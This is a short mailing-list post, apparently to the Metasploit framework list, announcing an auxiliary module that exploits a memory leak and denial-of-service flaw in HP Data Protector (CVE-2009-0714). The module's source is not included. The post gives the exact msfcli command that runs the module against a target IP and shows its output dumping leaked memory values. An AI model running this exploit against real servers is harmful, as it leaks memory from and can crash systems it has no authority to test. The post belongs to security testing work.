CVE-2009-0714: HP Dataprotector memory leak/Dos Exploit

[nicky.coder at gmail.com (Nicky)]

Hi,

An auxiliary module for the HP data protector is attached. An output of
module is shown below

n at n-laptop:/mnt/projects/metasploit$ ./msfcli
auxiliary/admin/dataprotector/hp_dataprotector RHOST=172.16.145.129
MEMORY=0x7ffdf000 E
[*]Please wait while we load the module tree...
[*] Starting Memory Address: 0x7ffdf000
[*] Leaking Memory: 0x7ffdf000 ->  0x12fbc4
[*] Leaking Memory: 0x7ffdf004 ->  0x130000
[*] Leaking Memory: 0x7ffdf008 ->  0x12d000
[*] Leaking Memory: 0x7ffdf00c ->  0x0
[*] Leaking Memory: 0x7ffdf010 ->  0x1e00
[*] Leaking Memory: 0x7ffdf014 ->  0x0
[*] Leaking Memory: 0x7ffdf018 ->  0x7ffdf000
[*] Leaking Memory: 0x7ffdf01c ->  0x0
[*] Leaking Memory: 0x7ffdf020 ->  0x674
[*] Leaking Memory: 0x7ffdf024 ->  0xa8
[*] Leaking Memory: 0x7ffdf028 ->  0x0
[*] Leaking Memory: 0x7ffdf02c ->  0x0
[*] Leaking Memory: 0x7ffdf030 ->  0x7ffd5000
[*] Leaking Memory: 0x7ffdf034 ->  0x0
[*] Leaking Memory: 0x7ffdf038 ->  0x0
[*] Leaking Memory: 0x7ffdf03c ->  0x0
[*] Leaking Memory: 0x7ffdf040 ->  0xe20abeb0
[*] Leaking Memory: 0x7ffdf044 ->  0x0
[*] Leaking Memory: 0x7ffdf048 ->  0x0
[*] Leaking Memory: 0x7ffdf04c ->  0x0


Thanks,
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090621/f8277b7b/attachment.htm>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: hp_dataprotector.rb
Type: application/octet-stream
Size: 4063 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090621/f8277b7b/attachment.obj>